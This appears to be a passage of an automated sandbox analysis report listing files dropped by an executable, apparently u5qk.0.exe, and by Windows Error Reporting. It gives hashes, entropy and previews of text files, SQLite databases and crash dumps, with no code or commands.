                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.694985340190863
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                                                                                                    MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                                                                                                    SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                                                                                                    SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                                                                                                    SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.696178193607948
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                    MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                    SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                    SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                    SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                                                                                    Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                    MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                    SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                    SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                    SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):5242880
                                                                                                                                                                                                                                    Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                    Entropy (8bit):1.0816174722533163
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:5LUSXnLxE03F1ejsqpeugCzuiFIZ24IO8nDFs:1UqnLx/3F1ejwCzuiFIY4IO8nZ
                                                                                                                                                                                                                                    MD5:DA472F4FB1B9AC8F5663446CE0AA40B9
                                                                                                                                                                                                                                    SHA1:55924826B71D57BA60D9664B5A4ACB6EA620482B
                                                                                                                                                                                                                                    SHA-256:2C29CF97942F62FA46EA41BB89EF4AE223C67D3A92F5E790B21D66A595807E2C
                                                                                                                                                                                                                                    SHA-512:FDC27469BE65A25BC1748E1398482384D04601C6423B12B94EEFC9E93F3C61CAE31E169883E52F2B597377B167887E4FA364163B6FC3EC11D00150F477B7ACAF
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.4.7.9.1.9.9.8.7.7.8.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.4.7.9.2.1.2.8.4.6.6.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.6.c.b.c.4.1.-.8.2.4.8.-.4.8.8.b.-.b.2.e.5.-.c.3.2.a.c.9.3.c.5.2.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.f.7.d.1.3.c.-.b.e.7.a.-.4.a.b.2.-.9.0.3.1.-.0.f.6.1.8.0.0.7.5.a.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.V.u.c.R.f.0.j.b.o.S...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.c.-.0.0.0.1.-.0.0.1.4.-.8.3.e.1.-.3.9.d.0.3.1.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.8.0.7.4.4.6.b.1.c.1.d.a.7.0.4.0.3.5.9.0.8.0.f.3.1.5.6.3.5.5.d.0.0.0.0.f.f.f.f.!.0.0.0.0.1.0.c.b.b.b.1.5.c.e.4.2.e.4.3.2.8.4.4.1.1.0.9.6.6.8.e.b.d.a.4.d.4.b.7.c.1.5.e.b.!.V.u.c.R.f.0.j.b.o.S...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                    Entropy (8bit):1.1431558460688327
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:S7WXuSqXJy0tIvdjsqZrP2f9HmzuiFjZ24IO8t:pXuSqXJ5tIvdjlCGzuiFjY4IO8t
                                                                                                                                                                                                                                    MD5:C681FF140109146BDC2095F0ABE703FA
                                                                                                                                                                                                                                    SHA1:C3882630A84C9B7275CDB62A8EB05A77B483BBE6
                                                                                                                                                                                                                                    SHA-256:93F8F411B3A480BC4815EC28030A2D7AC30D02896CE6534266CFF4DFFEF2BB40
                                                                                                                                                                                                                                    SHA-512:EC8835984663529D2FD41DD6BA624960B91044AD5906AE11B44183FB5127D7A3E6900E716B11C3A0C7B3B116286EE2A9AD3BF4BA147B6CA04D49657F0A0CA20B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.4.7.9.4.3.9.6.7.5.4.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.4.7.9.4.5.2.1.7.5.3.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.5.f.b.6.c.2.-.8.e.f.4.-.4.c.9.8.-.a.1.1.e.-.b.c.c.a.9.8.c.c.3.e.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.1.2.d.4.0.d.-.b.7.b.8.-.4.f.9.a.-.b.5.9.b.-.1.6.0.c.9.a.b.f.6.5.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.q.k...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.c.-.0.0.0.1.-.0.0.1.4.-.9.8.c.8.-.8.b.d.3.3.1.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.5.7.8.d.9.1.6.0.2.1.2.3.e.b.5.e.a.0.d.7.3.0.3.2.c.a.9.a.5.c.0.0.0.0.f.f.f.f.!.0.0.0.0.0.b.7.6.3.9.2.2.6.5.5.1.0.9.3.2.c.5.d.a.4.8.e.c.c.d.3.4.f.1.2.a.9.0.7.a.7.a.5.2.!.u.5.q.k...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 23:32:00 2024, 0x1205a4 type
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):51132
                                                                                                                                                                                                                                    Entropy (8bit):2.8415651064071348
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:WT5QY7JT+9eSzQ2jE1jiNetkEjc0wYX7wkJEeoXq9:+WGg9eSzQ2jE1WNe7jc0BdOq9
                                                                                                                                                                                                                                    MD5:0F420530F139029D70FE671D4D5B3D47
                                                                                                                                                                                                                                    SHA1:3E59DEA3501147D89ED2E0A828977451703FDE91
                                                                                                                                                                                                                                    SHA-256:162A442A30C7A819B43C6272A9329A7B26CD56FF9AC71740672820F404F1BCC4
                                                                                                                                                                                                                                    SHA-512:002B573319D58105AB26F4025BE49A86E9F33DD080F98A9FA675962535E7A16B7FF9D250714AA1C9C8EB8AF862E79B80B44C4CD8637A3DC070E000CDAA586178
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MDMP..a..... .......p9,f............4...........H...H.......d....#......t...D?..........`.......8...........T............:...............(...........*..............................................................................eJ......x+......GenuineIntel............T...........;9,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):8334
                                                                                                                                                                                                                                    Entropy (8bit):3.696089881232681
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJvy607j6Y9lSU1tngmfqQjpDG89bWZsfqSm:R6lXJq607j6YvSU19gmfqMWyfW
                                                                                                                                                                                                                                    MD5:49B2C7425E8BEB44FA9921966DC4E498
                                                                                                                                                                                                                                    SHA1:C7B3275B2D099779C9FDF6E2BAA8D51EE3CFF6CF
                                                                                                                                                                                                                                    SHA-256:A12BBE1D80C0B46B42EAD28B07D42CC307E72474BE4F048E84E55650F85C5D42
                                                                                                                                                                                                                                    SHA-512:D25D1A81827C560F53B48A813A56F9FD47274E3740F7040D3A5A62A2D9B34C4DBF793D661EE9BF39BE2592FED3BC546F8423077EBB72C574C7F7F970866B08F2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.3.6.<./.P.i.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):4579
                                                                                                                                                                                                                                    Entropy (8bit):4.463178001256605
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsuJg77aI974WpW8VYBYm8M4J8n77FFaC+q8PfoIffwITI3d:uIjfkI79x7VZJ8nfPMfBffwITI3d
                                                                                                                                                                                                                                    MD5:86282E9F1B00B198AF1D9E63FC586C27
                                                                                                                                                                                                                                    SHA1:3A5CE31BD434BC61C3CBCE1315F010E8C51BC029
                                                                                                                                                                                                                                    SHA-256:F16BD8EB5F38B4BAFE50B0DEFDBC5F43DB3228ECFB1572C57B42AC1D38ECA0B4
                                                                                                                                                                                                                                    SHA-512:B6BA90EDF487403719963AB45A55BA3C5023CDC8F2D3EFDA6FBCE68779162AA2124F08C26A4780AAF2C71ADFC51C64DB71252970843D5B7C10A87B42A36ACB2D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297514" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 23:32:24 2024, 0x1205a4 type
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):62430
                                                                                                                                                                                                                                    Entropy (8bit):2.7239493318959074
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:jqoGFAF4Mm1gExBMBkDTi/TRdPcqWVetkX57HH:uFAi1gEL5TQTRdPED57n
                                                                                                                                                                                                                                    MD5:0CE89B994D41A433E244E5ACC847ACE1
                                                                                                                                                                                                                                    SHA1:CFF7324C3AFAFF049E23335A8663D065347D38A7
                                                                                                                                                                                                                                    SHA-256:2D1029A71E5575D3CBAB933E0F2197A0006DF1927A79938D6400B15C0ED94C50
                                                                                                                                                                                                                                    SHA-512:227CB6C2111630AC25DB8FB1522DA0A65C645A33B25A1D96AD035E1CD1829FF6515022E043F2742BD8AC909E1A424F5040C5A6A62EDD766F586BF97C34662D3C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:MDMP..a..... ........9,f............4............ ..<...........v9..........T.......8...........T............Z..............((...........*..............................................................................eJ.......*......GenuineIntel............T.......\...A9,f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
